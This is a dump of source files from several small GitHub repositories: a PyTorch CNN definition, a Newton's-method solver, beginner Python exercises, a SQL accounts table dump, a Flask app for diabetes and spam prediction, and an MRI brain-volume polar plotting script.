kernel_size=1, stride=1, padding=0, bias=False)\n self.phi46_bn = nn.BatchNorm2d(t6)\n self.phi46_act = nn.ReLU6(inplace=True)\n self.phi47_conv = nn.Conv2d(t6, t6, kernel_size=3, stride=1, padding=1, groups=t6, bias=False)\n self.phi47_bn = nn.BatchNorm2d(t6)\n self.phi47_act = nn.ReLU6(inplace=True)\n self.phi48_conv = nn.Conv2d(t6, c6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi48_bn = nn.BatchNorm2d(c6)\n # seventh block\n self.phi49_conv = nn.Conv2d(c6, t6, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi49_bn = nn.BatchNorm2d(t6)\n self.phi49_act = nn.ReLU6(inplace=True)\n self.phi50_conv = nn.Conv2d(t6, t6, kernel_size=3, stride=1, padding=1, groups=t6, bias=False)\n self.phi50_bn = nn.BatchNorm2d(t6)\n self.phi50_act = nn.ReLU6(inplace=True)\n self.phi51_conv = nn.Conv2d(t6, c7, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi51_bn = nn.BatchNorm2d(c7)\n # classifier\n self.phi52_conv = nn.Conv2d(c7, c8, kernel_size=1, stride=1, padding=0, bias=False)\n self.phi52_bn = nn.BatchNorm2d(c8)\n self.phi52_act = nn.ReLU6(inplace=True)\n self.phi53_avg = nn.AvgPool2d(kernel_size=7, stride=1, padding=0)\n self.phi53_fc = nn.Linear(c8, 1000)\n\n self._initialize_weights()\n\n def _initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. 
/ n))\n if m.bias is not None:\n m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n m.weight.data.normal_(0, 0.01)\n m.bias.data.zero_()\n\n def forward(self, x, withStats=False):\n # first block\n x = self.phi01_conv(x)\n x = self.phi01_bn(x)\n x = self.phi01_act(x)\n x = self.phi02_conv(x)\n x = self.phi02_bn(x)\n x = self.phi02_act(x)\n x = self.phi03_conv(x)\n x = self.phi03_bn(x)\n # second block\n x = self.phi04_conv(x)\n x = self.phi04_bn(x)\n x = self.phi04_act(x)\n x = self.phi05_conv(x)\n x = self.phi05_bn(x)\n x = self.phi05_act(x)\n x = self.phi06_conv(x)\n x = self.phi06_bn(x)\n x_res = self.phi07_conv(x)\n x_res = self.phi07_bn(x_res)\n x_res = self.phi07_act(x_res)\n x_res = self.phi08_conv(x_res)\n x_res = self.phi08_bn(x_res)\n x_res = self.phi08_act(x_res)\n x_res = self.phi09_conv(x_res)\n x_res = self.phi09_bn(x_res)\n x = x + x_res\n # third block\n x = self.phi10_conv(x)\n x = self.phi10_bn(x)\n x = self.phi10_act(x)\n x = self.phi11_conv(x)\n x = self.phi11_bn(x)\n x = self.phi11_act(x)\n x = self.phi12_conv(x)\n x = self.phi12_bn(x)\n x_res = self.phi13_conv(x)\n x_res = self.phi13_bn(x_res)\n x_res = self.phi13_act(x_res)\n x_res = self.phi14_conv(x_res)\n x_res = self.phi14_bn(x_res)\n x_res = self.phi14_act(x_res)\n x_res = self.phi15_conv(x_res)\n x_res = self.phi15_bn(x_res)\n x = x + x_res\n x_res = self.phi16_conv(x)\n x_res = self.phi16_bn(x_res)\n x_res = self.phi16_act(x_res)\n x_res = self.phi17_conv(x_res)\n x_res = self.phi17_bn(x_res)\n x_res = self.phi17_act(x_res)\n x_res = self.phi18_conv(x_res)\n x_res = self.phi18_bn(x_res)\n x = x + x_res\n # fourth block\n x = self.phi19_conv(x)\n x = self.phi19_bn(x)\n x = self.phi19_act(x)\n x = self.phi20_conv(x)\n x = self.phi20_bn(x)\n x = self.phi20_act(x)\n x = self.phi21_conv(x)\n x = self.phi21_bn(x)\n x_res = self.phi22_conv(x)\n x_res = self.phi22_bn(x_res)\n x_res = self.phi22_act(x_res)\n x_res = self.phi23_conv(x_res)\n x_res = self.phi23_bn(x_res)\n x_res = self.phi23_act(x_res)\n x_res = self.phi24_conv(x_res)\n x_res = self.phi24_bn(x_res)\n x = x + x_res\n x_res = self.phi25_conv(x)\n x_res = self.phi25_bn(x_res)\n x_res = self.phi25_act(x_res)\n x_res = self.phi26_conv(x_res)\n x_res = self.phi26_bn(x_res)\n x_res = self.phi26_act(x_res)\n x_res = self.phi27_conv(x_res)\n x_res = self.phi27_bn(x_res)\n x = x + x_res\n x_res = self.phi28_conv(x)\n x_res = self.phi28_bn(x_res)\n x_res = self.phi28_act(x_res)\n x_res = self.phi29_conv(x_res)\n x_res = self.phi29_bn(x_res)\n x_res = self.phi29_act(x_res)\n x_res = self.phi30_conv(x_res)\n x_res = self.phi30_bn(x_res)\n x = x + x_res\n # fifth block\n x = self.phi31_conv(x)\n x = self.phi31_bn(x)\n x = self.phi31_act(x)\n x = self.phi32_conv(x)\n x = self.phi32_bn(x)\n x = self.phi32_act(x)\n x = self.phi33_conv(x)\n x = self.phi33_bn(x)\n x_res = self.phi34_conv(x)\n x_res = self.phi34_bn(x_res)\n x_res = self.phi34_act(x_res)\n x_res = self.phi35_conv(x_res)\n x_res = self.phi35_bn(x_res)\n x_res = self.phi35_act(x_res)\n x_res = self.phi36_conv(x_res)\n x_res = self.phi36_bn(x_res)\n x = x + x_res\n x_res = self.phi37_conv(x)\n x_res = self.phi37_bn(x_res)\n x_res = self.phi37_act(x_res)\n x_res = self.phi38_conv(x_res)\n x_res = self.phi38_bn(x_res)\n x_res = self.phi38_act(x_res)\n x_res = self.phi39_conv(x_res)\n x_res = self.phi39_bn(x_res)\n x = x + x_res\n # sixth block\n x = self.phi40_conv(x)\n x = self.phi40_bn(x)\n x = self.phi40_act(x)\n x = 
self.phi41_conv(x)\n x = self.phi41_bn(x)\n x = self.phi41_act(x)\n x = self.phi42_conv(x)\n x = self.phi42_bn(x)\n x_res = self.phi43_conv(x)\n x_res = self.phi43_bn(x_res)\n x_res = self.phi43_act(x_res)\n x_res = self.phi44_conv(x_res)\n x_res = self.phi44_bn(x_res)\n x_res = self.phi44_act(x_res)\n x_res = self.phi45_conv(x_res)\n x_res = self.phi45_bn(x_res)\n x = x + x_res\n x_res = self.phi46_conv(x)\n x_res = self.phi46_bn(x_res)\n x_res = self.phi46_act(x_res)\n x_res = self.phi47_conv(x_res)\n x_res = self.phi47_bn(x_res)\n x_res = self.phi47_act(x_res)\n x_res = self.phi48_conv(x_res)\n x_res = self.phi48_bn(x_res)\n x = x + x_res\n # seventh block\n x = self.phi49_conv(x)\n x = self.phi49_bn(x)\n x = self.phi49_act(x)\n x = self.phi50_conv(x)\n x = self.phi50_bn(x)\n x = self.phi50_act(x)\n x = self.phi51_conv(x)\n x = self.phi51_bn(x)\n # classifier\n x = self.phi52_conv(x)\n x = self.phi52_bn(x)\n x = self.phi52_act(x)\n x = self.phi53_avg(x)\n x = x.view(x.size(0), -1)\n x = self.phi53_fc(x)\n \n if withStats:\n stats = []\n return stats, x\n\n return x\n\n def forward_with_tensor_stats(self, x):\n stats, x = self.forward(x, withStats=True)\n return stats, x\n" } ]
40
reiracm/ANPI-Articulo2
https://github.com/reiracm/ANPI-Articulo2
e6ad564706e1eda0a795a01a05cafd5d04c131dc
cc865af2c35656d5e505c62f6e3815b3c46dcbe8
b1a53d4b13213d6e2cc8bf34f2aca229e757a6ac
refs/heads/master
2022-10-29T03:35:30.076618
2020-06-16T02:14:05
2020-06-16T02:14:05
272,588,450
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4267202913761139, "alphanum_fraction": 0.47765862941741943, "avg_line_length": 22.263158798217773, "blob_id": "8c5c1884349f527863023ad82ac3345f11f13732", "content_id": "c8c003c4268565432b3a2475fbe8629f54f8f4a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2239, "license_type": "no_license", "max_line_length": 108, "num_lines": 95, "path": "/metodo_1.py", "repo_name": "reiracm/ANPI-Articulo2", "src_encoding": "UTF-8", "text": "from sympy import Symbol\nimport numpy as np\n\n# From the exercise:\ndef function_exercise(wxyz):\n w, x, y, z = wxyz\n return [(w**2)+x-(3*y)+(4*z)+(3/4),\n (3*w**2)+x-(y**2)+(z**2)+(13/4),\n (5*w)+(3*x**2)+y-(4*z**2)-(99/2),(8*w**2)-(14*x)+(6*y**2)-(7*z**2)+7]\n\ndef jacobian_exercise(wxyz):\n w, x, y, z = wxyz\n return [[2*w,1,-3,4],\n [6*w,1,-2*y,2*z],\n [5,6*x,1,-8*z],[16*w,-14,12*y,-14*z]]\n\ndef JF(x):\n \n J_save = np.array(jacobian_exercise(x))\n \n return J_save\n\ndef F(x):\n \n F_save = np.array(function_exercise(x))\n \n return F_save\n\ndef iterative_newton(fun, var1, var2, jacobian,epsilon,itera):\n\n x_last = var1\n \n x_next = var2\n\n for i in range(itera):\n\n J = np.array(jacobian(x_last))\n \n F = np.array(fun(x_next))\n\n diff = np.linalg.solve( J, -F )\n \n x_last = x_last + diff\n \n x_next = x_next + diff\n\n # Validación del margen de error\n if np.linalg.norm(diff) < epsilon:\n \n return x_last\n \n break\n\n return x_last\n\n# For the exercice:\nx_sol = iterative_newton(function_exercise, [2.0,1.0,2.0,1.0],[2.0,1.0,2.0,1.0], jacobian_exercise, 0.1,100)\nprint('La solucion es:', x_sol )\n \n\ndef solve(x_0, tol, itera):\n\n a = (1) \n\n b = (-2)\n\n for i in range(itera):\n\n Jx_kF = iterative_newton(function_exercise, x_0, x_0,jacobian_exercise,tol,itera)\n\n y_k = x_0 - 1/2*(Jx_kF)\n\n Jy_kF = iterative_newton(function_exercise, y_k, x_0, jacobian_exercise,tol,itera)\n \n z_k = x_0 - Jy_kF\n\n Jy_xF = iterative_newton(function_exercise, y_k, x_0, jacobian_exercise,tol,itera)\n\n Jx_zF = iterative_newton(function_exercise, x_0, z_k, jacobian_exercise,tol,itera)\n\n Jy_zK = iterative_newton(function_exercise, y_k, z_k, jacobian_exercise,tol,itera)\n\n x_k = z_k - (a * Jx_zF) - (b * Jy_zK)\n\n x_0 = x_k\n \n return x_k\n \n \n \n \n\n#b = [-3/4,-13/4,99/2,-7]\n#x = 0\n#A = [[1,1,-3,4],[3,1,-1,1],[5,3,1,-4],[8,-14,6,-7]]\n \n \n \n \n" } ]
1
sruthi-perumalla/glarimy
https://github.com/sruthi-perumalla/glarimy
fd0a020c26edacf0793435d5e5c034679f5d5e0c
5b3c37433e0f72aefbf2f148d984360f2d276a42
f280cb800f83e40dcb373b89b8fc94d4c3b2f338
refs/heads/master
2022-11-30T20:38:15.440083
2020-08-17T11:26:50
2020-08-17T11:26:50
288,161,484
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5456919074058533, "alphanum_fraction": 0.5456919074058533, "avg_line_length": 19.27777862548828, "blob_id": "e43ade2dd9b0547294d7df4ec3ff165bee6566f9", "content_id": "5e5bb2e7c6d9d3ae14fbdf106efeb096cc238416", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 383, "license_type": "no_license", "max_line_length": 31, "num_lines": 18, "path": "/parse.py", "repo_name": "sruthi-perumalla/glarimy", "src_encoding": "UTF-8", "text": "def parse(filename):\r\n infile = open(filename)\r\n words = []\r\n for line in infile:\r\n temp = line.split()\r\n for i in temp:\r\n words.append(i)\r\n infile.close()\r\n words.sort()\r\n print(words)\r\n uniue_char = []\r\n for c in words:\r\n for d in c:\r\n \r\n if not d in uniue_char:\r\n uniue_char.append(d)\r\n print(uniue_char)\r\nsorting(\"sample.txt\")\r\n" }, { "alpha_fraction": 0.6227545142173767, "alphanum_fraction": 0.6227545142173767, "avg_line_length": 18.875, "blob_id": "61bb5598bafb47bbb91eb384c39e9432b8f0a18f", "content_id": "b38bb3e6c62bb9fddd0875a91aac950f11f02cee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 167, "license_type": "no_license", "max_line_length": 28, "num_lines": 8, "path": "/unique.py", "repo_name": "sruthi-perumalla/glarimy", "src_encoding": "UTF-8", "text": "str=input()\r\ndef deduplicate(str):\r\n uniue_char = []\r\n for c in str:\r\n if not c in uniue_char:\r\n uniue_char.append(c)\r\n print(uniue_char)\r\ndeduplicate(str)\r\n" }, { "alpha_fraction": 0.5300546288490295, "alphanum_fraction": 0.5355191230773926, "avg_line_length": 18.33333396911621, "blob_id": "291de23aa0063f9ba6f51e75dc9b0d28cb40f127", "content_id": "6b61752d143cc9b574526166b36cb8352ac660cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 183, "license_type": "no_license", "max_line_length": 46, "num_lines": 9, "path": "/sort.py", "repo_name": "sruthi-perumalla/glarimy", "src_encoding": "UTF-8", "text": "lst = [] \r\nn = int(input(\"Enter number of elements : \") )\r\nfor i in range(0, n): \r\n ele = input()\r\n lst.append(ele)\r\ndef sort(lst):\r\n lst.sort()\r\n print(lst)\r\nsort(lst)\r\n" } ]
3
nitinpasi/FRI
https://github.com/nitinpasi/FRI
41ed8c2e1216d8c8c2752bd0bd5cb4cadb6ae9cf
2c18733525ab1c27feb4776659ec911ff2f44e41
92e6b6aec8dce6a450bdaf106591ba76dc0bcf6b
refs/heads/master
2020-03-22T09:07:55.146942
2018-07-05T06:53:09
2018-07-05T06:53:09
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5680415630340576, "alphanum_fraction": 0.5839558243751526, "avg_line_length": 26.990909576416016, "blob_id": "bc05db02389bf69b7d9f7c475fc654ffb98b3fb3", "content_id": "32035b8ec1895cd462cd41a9e54934f2ad43aa5a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3079, "license_type": "no_license", "max_line_length": 181, "num_lines": 110, "path": "/FRI.py", "repo_name": "nitinpasi/FRI", "src_encoding": "UTF-8", "text": "import os, sys, csv, cv2\nimport numpy as np\nimport pandas as pd\nfrom keras.preprocessing.image import ImageDataGenerator, img_to_array, load_img\nimport warnings\nfrom PIL import Image\nfrom keras.preprocessing import image\nfrom keras.applications.imagenet_utils import preprocess_input\n\nfrom matplotlib.pyplot import imshow\n\n\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Conv2D, MaxPooling2D, Dropout, Flatten\n\n\npath = \"/Users/sharmarochan/Desktop/extracted files/augumented_image/\"\ntest_path = \"/Users/sharmarochan/Desktop/extracted files/resized_images/\"\n\n\ndirs = os.listdir( path )\ndirs_array = np.array(dirs)\ndirs_array_sort = np.sort(dirs_array)\n\n\ndef path_csv():\n with open('/Users/sharmarochan/Desktop/extracted files/image_path_lable.csv','w') as f:\n writer = csv.writer(f)\n lable =1\n image = 0\n val_store = \"Barking_deer\"\n\n\n for item in dirs_array_sort:\n\n if not item.startswith('.') and item != 'Thumbs.db':\n image = image + 1\n\n par1, par2, par3,par4,par5= item.rsplit('_', 4)\n im = path+item\n\n if val_store != par1:\n lable = lable + 1\n val_store = par1\n\n if not item.startswith('.') and item != 'Thumbs.db':\n if os.path.isfile(path + item):\n # im = Image.open(path + item)\n writer.writerow([im, lable])\n\n# path_csv()\n\n\n\ndef extract_pixels_from_jpg():\n\n with open('image_path_lable.csv', 'rb') as f:\n reader = csv.reader(f, delimiter=';')\n for row in reader:\n p = row[0]\n p1, p2 = p.split(',') #p1 is path, # p2 is lable\n print(p1)\n img_path = '/Users/sharmarochan/Desktop/extracted files/augumented_image/Barking_deer_agu_0_0_0.jpg'\n\n img = image.load_img(img_path, target_size=(256, 256))\n imshow(img)\n x = image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n x = preprocess_input(x)\n print (x.shape)\n\n break\n\nextract_pixels_from_jpg()\n\n\n\ndef dataaugumentation():\n\n with warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\", category = FutureWarning)\n\n datagen = ImageDataGenerator(featurewise_center=True, featurewise_std_normalization=True, rotation_range=20, width_shift_range=0.2, height_shift_range=0.2, horizontal_flip=True)\n image_per = 0\n\n\n for item in dirs_array_sort:\n\n if not item.startswith('.') and item != 'Thumbs.db':\n\n image_per = image_per + 1\n print(\"image: \", image_per)\n\n par1, par2 = item.rsplit('_', 1)\n\n im = load_img(path + item)\n x = img_to_array(im)\n x = x.reshape((1,) + x.shape)\n i = 0\n\n for batch in datagen.flow(x, batch_size=1, save_to_dir='augumented_image', save_prefix=par1 + '_agu_' + str(i), save_format='jpg'):\n i += 1\n if i > 15:\n break\n\n# dataaugumentation()\n\n\n\n# def createModel():\n" } ]
1
Surat-96/E2E_Diabetes_Spamham
https://github.com/Surat-96/E2E_Diabetes_Spamham
0ee07c55b6e26e3d46635d0fd745747e7597f9ba
e00221f52c9d72d417f6113f7f1b634b783af04f
227403667e7c31da538758c3fb342dd45efe54ca
refs/heads/master
2023-07-09T21:25:09.838655
2021-08-21T11:35:23
2021-08-21T11:35:23
279,217,875
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5820433497428894, "alphanum_fraction": 0.6408668756484985, "avg_line_length": 22.071428298950195, "blob_id": "f90c1a4a332a7355b2d06ad8a56ead1cea1e6c06", "content_id": "043268e8069ea06f8c0e6b38c5666bead2f9cba2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 1615, "license_type": "no_license", "max_line_length": 76, "num_lines": 70, "path": "/DB/py_accounts.sql", "repo_name": "Surat-96/E2E_Diabetes_Spamham", "src_encoding": "UTF-8", "text": "-- phpMyAdmin SQL Dump\n-- version 4.7.4\n-- https://www.phpmyadmin.net/\n--\n-- Host: 127.0.0.1\n-- Generation Time: Jul 01, 2020 at 09:08 AM\n-- Server version: 10.1.29-MariaDB\n-- PHP Version: 7.2.0\n\nSET SQL_MODE = \"NO_AUTO_VALUE_ON_ZERO\";\nSET AUTOCOMMIT = 0;\nSTART TRANSACTION;\nSET time_zone = \"+00:00\";\n\n\n/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;\n/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;\n/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;\n/*!40101 SET NAMES utf8mb4 */;\n\n--\n-- Database: `py_accounts`\n--\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `accounts`\n--\n\nCREATE TABLE `accounts` (\n `id` int(100) NOT NULL,\n `username` varchar(100) NOT NULL,\n `age` int(100) NOT NULL,\n `email` varchar(100) NOT NULL,\n `password` varchar(100) NOT NULL\n) ENGINE=InnoDB DEFAULT CHARSET=latin1;\n\n--\n-- Dumping data for table `accounts`\n--\n\nINSERT INTO `accounts` (`id`, `username`, `age`, `email`, `password`) VALUES\n(1, 'Surat Banerjee', 24, '[email protected]', 'surat'),\n(2, 'Moumita Banerjee', 30, '[email protected]', 'moumita');\n\n--\n-- Indexes for dumped tables\n--\n\n--\n-- Indexes for table `accounts`\n--\nALTER TABLE `accounts`\n ADD PRIMARY KEY (`id`);\n\n--\n-- AUTO_INCREMENT for dumped tables\n--\n\n--\n-- AUTO_INCREMENT for table `accounts`\n--\nALTER TABLE `accounts`\n MODIFY `id` int(100) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;\nCOMMIT;\n\n/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;\n/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;\n/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;\n" }, { "alpha_fraction": 0.6427457332611084, "alphanum_fraction": 0.6437857747077942, "avg_line_length": 28.136363983154297, "blob_id": "210cf8e10f38c7db415ffb5ff4a0c4396834fd7f", "content_id": "494a6091ad7063a6881e87bbdb2c645058e49b03", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1923, "license_type": "no_license", "max_line_length": 105, "num_lines": 66, "path": "/app.py", "repo_name": "Surat-96/E2E_Diabetes_Spamham", "src_encoding": "UTF-8", "text": "from flask import Flask,render_template,redirect,url_for,request\nimport pickle\nimport numpy as np\n\nfrom flask_mysqldb import MySQL\nimport MySQLdb.cursors\nimport re\n\n\napp = Flask(__name__, static_folder='static', template_folder='templates')\n\n#diabetes model read\nfilename = open('Diabetes/diabetespredictmodel.pkl', 'rb')\nmodel = pickle.load(filename)\nfilename.close()\n\n#spamham model read\nfilename = open('Spam_Ham/spam-sms-mnb-model.pkl', 'rb')\nclassifier = pickle.load(filename)\nfiles = open('Spam_Ham/cv-transform.pkl','rb')\ncv = pickle.load(files)\nfilename.close()\nfiles.close()\n\n\[email protected]('/')\ndef index():\n\treturn render_template('home.html')\n\[email protected]('/home')\ndef home():\n\treturn render_template('home.html')\n \[email 
protected]('/diapredict', methods=['GET','POST'])\ndef diapredict():\n if request.method == 'POST':\n na = request.form['na']\n pr = int(request.form['pr'])\n gl = int(request.form['gl'])\n bp = int(request.form['bp'])\n st = int(request.form['st'])\n ins = int(request.form['in'])\n bm = float(request.form['bm'])\n dp = float(request.form['dp'])\n ag = int(request.form['ag'])\n \n data = np.array([[pr,gl,bp,st,ins,bm,dp,ag]])\n my_prediction = model.predict(data)\n my_prediction_proba = model.predict_proba(data)[0][1]\n \n return render_template('diashow.html',name=na,prediction=my_prediction,proba=my_prediction_proba)\n return render_template('dia.html')\n\[email protected]('/sphampredict',methods=['GET','POST'])\ndef sphampredict():\n if request.method == 'POST':\n message = request.form['message']\n data = [message]\n vect = cv.transform(data).toarray()\n my_prediction = classifier.predict(vect)\n return render_template('sphamshow.html', prediction=my_prediction)\n return render_template('spham.html')\n\n \nif __name__ == '__main__':\n\tapp.run(debug=True)\n" }, { "alpha_fraction": 0.7628205418586731, "alphanum_fraction": 0.7820512652397156, "avg_line_length": 50.66666793823242, "blob_id": "ba603a7b350be64908533e927a16b40b92131f6e", "content_id": "93d2168d9d027f14c8287f524c43afce379aeec3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 157, "license_type": "no_license", "max_line_length": 88, "num_lines": 3, "path": "/README.md", "repo_name": "Surat-96/E2E_Diabetes_Spamham", "src_encoding": "UTF-8", "text": "# E2E_Diabetes_Spamham\nIt is an End 2 End ML Project with Machine\nLearning Algorithm (Random Forest, Naïve Bayes), Flask by Self Implement within 1 month.\n\n" } ]
3
vch338/MRI-plots
https://github.com/vch338/MRI-plots
d26558fca971dfef48d0538188b2cf7a3469e3ff
9de2a9d7153ab5f3dce3a4d920c0125309910206
679d3eb1a54ff1eadfa68a7f32de5e34c2060239
refs/heads/master
2021-01-23T05:18:44.513422
2017-06-28T15:00:48
2017-06-28T15:00:48
92,965,333
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 11, "blob_id": "cd8ff0ea852a9e3a17e4d55bca860696831f337c", "content_id": "c9183409e55f8e2e500331daaa7720dfbc5fc3a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 12, "license_type": "no_license", "max_line_length": 11, "num_lines": 1, "path": "/README.md", "repo_name": "vch338/MRI-plots", "src_encoding": "UTF-8", "text": "# MRI-plots\n" }, { "alpha_fraction": 0.4767351746559143, "alphanum_fraction": 0.4939899146556854, "avg_line_length": 29.696428298950195, "blob_id": "7b46c10e63f7006ba0e8634088dd8f81d8aa6588", "content_id": "54f02462cbd992e704aba9cffb9a61df264c7325", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10316, "license_type": "no_license", "max_line_length": 164, "num_lines": 336, "path": "/polar-mri.py", "repo_name": "vch338/MRI-plots", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n# default colors:\ndflt_color_norm = 'grey'\ndflt_color_dev = '#2E6DA4' # bluish\ngroups = \\\n[\n {\n 'color_dev': '#2E6DA4', # bluish\n 'Cortex' :\n [\n {\n 'Frontal': [ 'Frontallobevolume' ],\n },\n {\n 'Cingulate': [ 'Cingulatevolume' ],\n },\n {\n 'Temporal': [ 'Temporallobevolume' ],\n },\n {\n 'Insula': [ 'Insulavolume' ],\n },\n {\n 'Parietal': [ 'Parietallobevolume' ],\n }, \n {\n 'Occipital': [ 'Occipitallobevolume' ],\n },\n\t ],\n },\n {\n 'color_dev': '#5cb85c', # greenish\n 'White matter':\n [ \n {\n 'Frontal': [ {'RightFrontalWhiteMatter':'R'}, {'LeftFrontalWhiteMatter':'L'} ],\n\n # Override default group color for each subgroup like this:\n # 'color_dev': '#5cb85c', # greenish\n # 'color_norm': '#5cb85c', # greenish\n },\n {\n 'Cingulate': [ {'RightCingulateWhiteMatter':'R'}, {'LeftCingulateWhiteMatter':'L'} ],\n },\n {\n 'Corpus\\nCallosum': [ 'CorpusCallosum' ], \n },\n {\n 'Temporal': [ {'RightTemporalWhiteMatte':'R'}, {'LeftTemporalWhiteMatte':'L'} ],\n },\n { \n 'Insula': [ {'RightInsulaWhiteMatter':'R'}, {'LeftInsulaWhiteMatter':'L'} ],\n },\n {\n 'Parietal': [ {'RightParietalWhiteMatter':'R'}, {'LeftParietalWhiteMatter':'L'} ],\n },\n {\n 'Occipital': [ {'RightOccipitalWhiteMatter':'R'}, {'LeftOccipitalWhiteMatter':'L'} ],\n },\n ],\n },\n {\n 'color_dev': '#f0ad4e', # orangy\n 'Subcortical Regions' :\n [\n {\n 'Caudate': [ {'RightCaudate':'R'}, {'LeftCaudate':'L'} ],\n },\n {\n 'Accumbens': [ {'RightAccumbensArea':'R'}, {'LeftAccumbensArea':'L'} ],\n },\n { \n 'Putamen': [ {'RightPutame':'R'}, {'LeftPutame':'L'} ],\n },\n {\n 'Pallidum': [ {'RightPallidum':'R'}, {'LeftPallidum':'L'} ],\n },\n { \n 'Basal\\nForebrain': [ {'Right Basal Forebrain':'R'}, {'Left Basal Forebrain':'L'} ],\n },\n {\n 'Amygdala': [ {'RightAmygdala':'R'}, {'LeftAmygdala':'L'} ],\n },\n {\n 'Hippocampus': [ {'RightHippocampus':'R'}, {'LeftHippocampus':'L'} ],\n },\n {\n 'Ventral DC': [ {'Right Ventral DC':'R'}, {'Left Ventral DC':'L'} ],\n },\n {\n 'Thalamus': [ {'RightThalamusProper':'R'}, {'LeftThalamusProper':'L'} ],\n },\n {\n 'Brain Stem': [ 'BrainStem' ],\n },\n {\n 'Pons': [ 'Pons' ],\n },\n ],\n },\n {\n 'color_dev': '#d9534f', # redish\n 'Cerebellum':\n [\n {\n 'Anterior': [ 'Anterior' ],\n },\n {\n 'Superior Posterior': [ 'Superior_Posterior' ],\n },\n {\n 'Posterior': [ 'Posterior' ],\n },\n {\n 'Inferior Posterior': [ 'Inferior_Posterior' ],\n },\n {\n 'Vermis': [ 'Vermis' ],\n },\n {\n 'Deep nuclei': [ 'Deep_nuclei' ],\n },\n ],\n },\n]\n\nimport matplotlib as 
mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nimport itertools\nimport csv,sys\nimport numpy as np\ncsv.register_dialect('tab', delimiter='\\t', quoting=csv.QUOTE_NONE)\n\ndef usage():\n print 'Usage: polar-mri.py [OPTIONS] <in.txt> <out.png|pdf|svgz>'\n print 'Options:'\n print ' -a, --abs-dev Preserve sign of the deviation'\n print ' -c, --config <file> Config file'\n print ' -d, --deviation <num> Highlight deviations bigger than this [0.05]'\n print ' -h, --help This help message'\n sys.exit(1)\n\ndef usage_example():\n print \"\\nExample of valid input:\"\n print \"\\tRightAccumbensArea LeftAccumbensArea RightAmygdala etc..\"\n print \"\\t0.5% 2.9% 33.1% etc..\\n\"\n\n\nabs_dev = False\nin_file = None\nout_file = None\nconfig = None\ndev = 0.05\nif len(sys.argv) < 2: usage()\nargs = sys.argv[1:]\nwhile len(args):\n if args[0]=='-a' or args[0]=='--abs-dev': \n abs_dev = True\n elif args[0]=='-?' or args[0]=='-h' or args[0]=='--help': \n usage()\n elif args[0]=='-c' or args[0]=='--config': \n args = args[1:]\n config = args[0]\n elif args[0]=='-d' or args[0]=='--deviation': \n args = args[1:]\n dev = float(args[0])\n elif in_file == None: in_file = args[0]\n elif out_file == None: out_file = args[0]\n else: usage()\n args = args[1:]\n\nif config!=None: execfile(config)\nlines = open(in_file, 'rb').readlines()\n\nif len(lines) != 2: \n print \"Error: expected two lines on input, got: \",len(lines)\n usage_example()\n sys.exit(1)\n\nall_cols = lines[0].split('\\t')\nall_vals = lines[1].split('\\t')\n\nif len(all_cols) != len(all_vals): \n print \"Error: different number of fields in the two lines: \",len(all_cols),\" vs \",len(all_vals)\n usage_example()\n sys.exit(1)\n\ncols_hash = {}\nfor i in range(len(all_cols)):\n key = all_cols[i].strip()\n val = all_vals[i].strip().rstrip('%')\n try:\n val = float(val)/100.\n except:\n pass\n continue\n if abs_dev: val += 1\n else: val = 1 - abs(val)\n cols_hash[key] = val\n\nltmp = [] # labels, can repeat multiple times\nlbls = []\nxlbls = []\nlbls2 = []\nxvals = []\nyvals = []\ncols = []\nsgrp = []\nfor hash in groups:\n color_dev = dflt_color_dev\n color_norm = dflt_color_norm\n if 'color_dev' in hash: color_dev = hash['color_dev']\n if 'color_norm' in hash: color_norm = hash['color_norm']\n for grp in hash:\n if grp=='color_dev': continue\n if grp=='color_norm': continue\n for shash in hash[grp]:\n for key in shash:\n for column in shash[key]:\n lbl2 = None\n if type(column).__name__ == 'dict':\n for cname in column:\n #if key=='Thalamus' or key=='Parietal' or key=='Pallidum' or key=='Putame': lbl2 = column[cname]\n lbl2 = column[cname]\n column = cname\n break\n if column not in cols_hash: continue\n lbls2.append(lbl2)\n ltmp.append(key)\n yvals.append(cols_hash[column])\n sgrp.append(grp)\n color = []\n if 'color_dev' in shash: 